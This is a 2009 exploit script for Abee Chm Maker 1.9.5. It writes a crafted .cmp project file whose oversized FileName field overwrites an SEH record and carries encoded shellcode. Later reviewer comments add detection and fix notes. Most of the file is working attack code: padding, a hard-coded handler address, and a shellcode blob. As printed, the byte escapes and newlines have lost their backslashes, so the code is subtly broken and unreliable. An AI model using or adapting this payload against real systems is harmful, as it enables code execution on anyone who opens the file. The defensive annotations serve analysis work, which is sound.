# Title : Abee Chm Maker 1.9.5 (CMP File) Stack overflow Exploit
# Published : 2009-03-27
# Author : Encrypt3d.M!nd
# exploit.py
# Abee Chm Maker 1.9.5 Stack overflow Exploit
# By:Encrypt3d.M!nd
#
# After importing "Devil_inside.cmp" file into the program
# go to File>>Make CHM.. Then...watch :) .
#
# I've used the SEH overwrite method to make it more stable.
# btw: it's universal, so don't bother yourself with finding addresses ;)
#
# Two 4-value strings that the FileName payload below places directly after
# the 320-repetition filler, in this order (ns, then sh).
# NOTE(review): as rendered on this page the values are plain ASCII text
# ("xEB...") rather than escaped byte values; documented here as shown.
# ns: presumably the "next record" field of the overwritten SEH record
# (the header comment says the SEH overwrite method is used) -- confirm.
ns = "xEBx06x90x90"
# sh: presumably the overwritten handler pointer. It is a fixed value the
# author calls "universal"; the page does not say which module it points into.
# NOTE(review): a hard-coded handler address depends on that image loading at
# a fixed base and on handler validation (SafeSEH / SEHOP) not rejecting it,
# so whether those mitigations are enabled likely decides exposure -- verify.
sh = "x05x67x35x45"
# Opaque payload blob; the FileName value below appends it after ns, sh and
# 20 repetitions of "x90".
# NOTE(review): the page never states what this payload does when executed;
# establish that by analysis in an isolated environment rather than assuming.
# After the first ten values, every value shown is in the printable ASCII
# range, which looks like an alphanumeric-encoded payload -- TODO confirm.
# For detection this means the oversized field would be mostly printable text,
# so length is a more reliable signal than the presence of non-printable bytes.
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x37x49x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x41x31x50x41x42x6bx42x41x71x32x42x42x42x32"
"x41x41x30x41x41x58x38x42x42x50x75x4dx39x69x6cx4d"
"x38x43x74x35x50x53x30x77x70x4ex6bx53x75x77x4cx4c"
"x4bx63x4cx54x45x34x38x67x71x5ax4fx6cx4bx62x6fx75"
"x48x6ex6bx41x4fx47x50x33x31x58x6bx63x79x4ex6bx36"
"x54x4cx4bx45x51x68x6ex34x71x59x50x4cx59x4cx6cx4f"
"x74x6fx30x72x54x47x77x58x41x39x5ax34x4dx57x71x69"
"x52x48x6bx69x64x67x4bx46x34x66x44x74x44x53x45x6b"
"x55x4cx4bx43x6fx31x34x67x71x78x6bx63x56x4cx4bx54"
"x4cx62x6bx6ex6bx31x4fx67x6cx37x71x78x6bx4cx4bx45"
"x4cx4cx4bx73x31x4ax4bx6cx49x51x4cx74x64x67x74x6b"
"x73x34x71x6fx30x42x44x6cx4bx71x50x34x70x4ex65x4f"
"x30x62x58x46x6cx6cx4bx41x50x44x4cx4cx4bx42x50x65"
"x4cx4ex4dx6ex6bx50x68x34x48x4ax4bx73x39x6ex6bx4b"
"x30x4cx70x57x70x63x30x37x70x4ex6bx42x48x57x4cx51"
"x4fx56x51x48x76x31x70x73x66x6ex69x59x68x4ex63x4f"
"x30x73x4bx66x30x65x38x68x70x6dx5ax34x44x51x4fx30"
"x68x4ex78x4bx4ex6cx4ax54x4ex32x77x79x6fx79x77x41"
"x73x75x31x72x4cx41x73x57x70x61")
# First half of the generated .cmp project file: the XML prologue and the
# "Contents" group up to, and including, an unterminated FileName value.
# The FileName value is the only oversized field. Its layout is:
#   320 repetitions of "x41" | ns | sh | 20 repetitions of "x90" |
#   shellcode | 5000 repetitions of "x41"
# NOTE(review): the title calls this a stack overflow, so the application
# presumably copies FileName into a fixed-size stack buffer without a length
# check; bounding that copy in the parser is the root fix -- confirm.
# A FileName parameter thousands of characters long is far beyond any plausible
# path, which makes field length a simple check for scanning .cmp files.
header1 = (
'<?xml version="1.0" encoding="Windows-1252" ?>n'
'<XMLConfig><info>Chm Maker project</info>n'
'<group name="Contents">n'
' <group name="0">n'
' <param name="Caption">filename</param>n'
' <param name="Level">0</param>n'
' <param name="FileName">'+"x41"*320+ns+sh+"x90"*20+shellcode+"x41" * 5000)
# Second half of the generated .cmp project file. It closes the FileName
# parameter opened at the end of header1 and then supplies the remaining
# groups (Contents count, Keywords, KeywordsFinder, Customize) with short,
# fixed values; none of these fields carries oversized data.
# NOTE(review): presumably these groups only keep the file well-formed enough
# for the application to accept the project -- not stated on the page.
header2 = (
'</param>n'
' </group>n'
' <param name="Count">1</param>n'
'</group>n'
'<group name="Keywords">n'
' <param name="Count">0</param>n'
'</group>n'
'<group name="KeywordsFinder">n'
' <param name="UseMeta">1</param>n'
' <param name="UseBold">1</param>n'
' <param name="UseItalic">0</param>n'
' <param name="UseUnder">0</param>n'
' <param name="UseHTag">1</param>n'
' <param name="UseTabHeader">0</param>n'
' <param name="MaxKeyLength">32</param>n'
' <param name="LiveUpdate">0</param>n'
'</group>n'
'<group name="Customize">n'
' <param name="MainTitle">kkkkkkkkkkkkkkk</param>n'
' <param name="DefaultPage"></param>n'
' <param name="Left">0</param>n'
' <param name="Top">0</param>n'
' <param name="Width">0</param>n'
' <param name="Heigth">0</param>n'
' <param name="HideShow">1</param>n'
' <param name="Back">1</param>n'
' <param name="Forward">1</param>n'
' <param name="Stop">0</param>n'
' <param name="Refresh">0</param>n'
' <param name="Options">1</param>n'
' <param name="Print">1</param>n'
' <param name="Font">0</param>n'
' <param name="Locate">0</param>n'
' <param name="Home">0</param>n'
' <param name="HomePage"></param>n'
' <param name="Jump1">0</param>n'
' <param name="Jump1Page"></param>n'
' <param name="Jump1Title"></param>n'
' <param name="Jump2">0</param>n'
' <param name="Jump2Page"></param>n'
' <param name="Jump2Title"></param>n'
' <param name="Search">1</param>n'
' <param name="AdditionalFiles"></param>n'
'</group>n'
'</XMLConfig>n'
)
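# Write the two halves as one project file in the current working directory.
# The context manager closes the handle even if write() raises, and the name
# `out` avoids rebinding `file`, which is a builtin in Python 2.
with open('Devil_Inside.cmp','w') as out:
    out.write(header1+header2)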